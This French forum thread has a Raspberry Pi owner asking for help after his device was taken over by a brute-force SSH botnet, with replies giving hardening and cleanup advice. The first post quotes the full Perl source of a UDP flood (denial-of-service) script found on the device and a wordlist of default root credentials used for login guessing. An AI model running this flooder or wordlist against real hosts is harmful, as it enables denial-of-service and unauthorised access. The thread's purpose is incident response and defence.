virus ??? ScannerEnzo

[flyjodel]

Bonjour à tous,

j'ai un RPi qui tourne pour me faire un petit serveur de test.

hier, je n'avais plus accès à mon RPi avec mon user/mdp habituel, je me suis donc connecté en root ce matin.
Le contenu de mon répertoire /home/user a complètement changé. Ce qui était dedans a disparu et voici son contenu :

Code : Tout sélectionner

pi@raspberrypi ~ $ ls
enzo  mix  mix.zip  ScannerEnzo

quand je regarde dedans :

Code : Tout sélectionner

pi@raspberrypi ~ $ cat enzo
#!/usr/bin/perl
use Socket;
$ARGC=@ARGV;
if ($ARGC !=3) {
printf "* Ai gresit comanda hecare, foloseste: $0 <ip> <port> <time> *\n";
exit(1);
}
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf " |¯¯¯¯¯¯¯¯¯¯|×ღ×|¯¯¯¯¯¯¯¯¯¯|
     …Enzo darama IP'u…
  ………IP Down [GoodBye!]………
 |__________|×ღ×|__________| \n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 8, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +0;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));

dans mix il y a :

Code : Tout sélectionner

pi@raspberrypi ~/mix $ ls
a  core  fish  g  gb  mass  pass  passfile  pscan  pscan2  s  screen  ssh  vuln

dans le fichier pass, il y a une liste de user/mdp usuels :

Code : Tout sélectionner

pi@raspberrypi ~/mix $ cat pass
root:123456
root:toor
root:password
root:qwerty
root:1qaz2wsx
root:security
root:matt
root:vps
root:linode.com
root:linod3.com
test1:test1
test2:test2
test3:test3
test4:test4
test5:test5
test6:test6
test7:test7
test8:test8
test9:test9
test10:test10
test11:test11
install:install
backup:backup
root:root2013
root:root2012
root:root2011
root:toor2012
root:toor2013
root:vps2013
root:vps2012
root:install
root:remuser
root:goodbye
root:secretpass
root:letsgou
root:king
root:king123
root:1234
root:postgres
root:fedora
root:private
root:privatesystem
root:privatessh
root:insert
root:page
root:web
root:sniper

Je vous passe tous les autres fichiers... Evidemment cela ressemble à un bon petit virus qui s'est installé là tout seul, bien gentiment.
Mon RPi n'est évidemment pas sécurisé du tout, bon d'accord je sais j'ai tord , mea culpa, mais je ne voulais pas taper de mots de passe à rallonge quoi. Bref, ce n'est pas très grave si je perds tout, c'est juste un serveur pour rire.

Je vais tout virer, repartir d'une sauvegarde propre et puis mettre des vrais mots de passe. A mon avis, celui-ci ne fait pas beaucoup de mal car il n'a pas mon MDP root, que j'avais pris la peine de changer quand même...

Si vous avez des avis ou des suggestions, je suis preneur, car je n'y connais pas grand chose.
a+ !!!

[flyjodel]

ah, petite précision tout de même :

en explorant les fichiers générés par ce script, j'ai trouvé tous les logs "history" de mes accès mysql, bash etc etc etc. donc, d'autres mots de passe qui y sont référencés etc.

Je me rends compte, que même si j'ai laissé le mot de passe bidon pour la session en cours, j'ai bien fait de mettre un mot de passe différent pour chaque activité. Ainsi je ne perds pas tout.

Une question, comment se fait il que ce script qui était hébergé dans la session /home/pi a pu récupérer l'historique de #bash ?

Merci

[destroyedlolo]

Salut,

Pour éviter que ca ne se reproduise :

• change le port de sshd
• désactive que le fait qu'on puisse se logger root depuis l’extérieur (normalement, tu dois d'abord te logger sur un compte banal puis su vers root)
• sur ta box ou ton firewall, ne laisse que les ports entrant vraiment utile ... en particulier, desactive ssh si tu ne te log jamais depuis l'exterrieur
• si tu utilise des framework ou des applis web comme PHPbb, vérifie qu'il soit bien à jour ainsi que PHP.
• backup

[maxty01]

Bonjour,

Ton RPI était sans doute accessible depuis le net et le mot de pass de PI n'étais pas changé ...

Ton RPI a été tranformer en BotNet depuis l'extérieur.

Pour sécuriser ton SSH et ton RPi, tu peux lire ce tuto : viewtopic.php?f=3&t=283

Bon weekend,

[domi]

Bonjour,

Pour ce qui est d'un virus, c'est peu probable, nous ne sommes pas sous W$.

Par contre, comme beaucoup te le préconise, si ton Pi est accessible de l'extérieur, il faut obligatoirement mettre un mot de passe assez complexe, car des robots tentent le brute force sur le SSH.
Par sécurité, j'ai pour habitude de changer le port par défaut SSH par un autre. Pas besoin de modifier la config SSHD, cela t'évite en interne d'avoir toujours le port à préciser. Pour cela, je fait une règle de routage sur mon routeur qui par exemple, va rediriger le port de ton choix (2222 par exemple), vers l'adresse IP de ton Pi avec le port 22.

Par l'extérieur, t'es obligé de te connecter vers ton IP Public, sur le port 2222 (pour l'exemple donné), en interne tu te connectes avec l'IP privé, sans préciser de port car c'est celui par défaut.

Cdt

[flyjodel]

Vous êtes géniaux !

Moi qui pensais que la sécurité informatique ce n'était que pour les idiots... je me rends compte maintenant que j'en fais partie.

En effet, j'ai par l'intermédiaire de l'article mentionné trouvé un fichier AUTH.LOG qui contient tous les essais de connexion. J'ai plein de connexions depuis quelques jours en provenance d'une (ou plusieurs) IP en Chine : 183.3.202.113
Je vais suivre toutes les étapes de cet article et j'ai changé le port, qui même si ce n'est pas une solution ultime, permettra de bloquer ceux qui ne scannent pas les ports et ne s'attaquent qu'au 22.

Une autre question, avant de tout dézinguer dans mon RPi, à part le contenu du répertoire /home/pi qui avait été changé (et que j'ai vidé), comment puis-je être sûr qu'il ne reste pas un truc quelque part qui réactiverait ce robot ? en consultant les connexions de auth.log ? J'ai consulté en mode root les tâches automatiques "crontab -e" mais je n'ai rien trouvé de suspect.

Merci

[marco123]

éviter les réponses aux ping sur les box
détourner, comme dit Domi, les accès

je sais pas si fail2ban ou denyhosts existe sur raspian ... a voir

pour ces 2 voir :

https://www.debian-fr.org/t/serveur-web ... y-pi/56361

[destroyedlolo]

Moi perso je prendrai pas le risque de récupérer toutes les données et j'effacerai tout exprès installerez. Voilà

[destroyedlolo]

Pardon. La reconnaissance vocale de Google a perdu la moitié des mots.
Je voulais dire que je ne prendrai pas de risque: je récupèrerai les données (vidéo, images, ...). Si t'as une BD, export des données uniquement,pas de procédures, et je réformate le tout + réinstaller.

[domi]

+1
Récup des données et reformatage après avoir été hacké.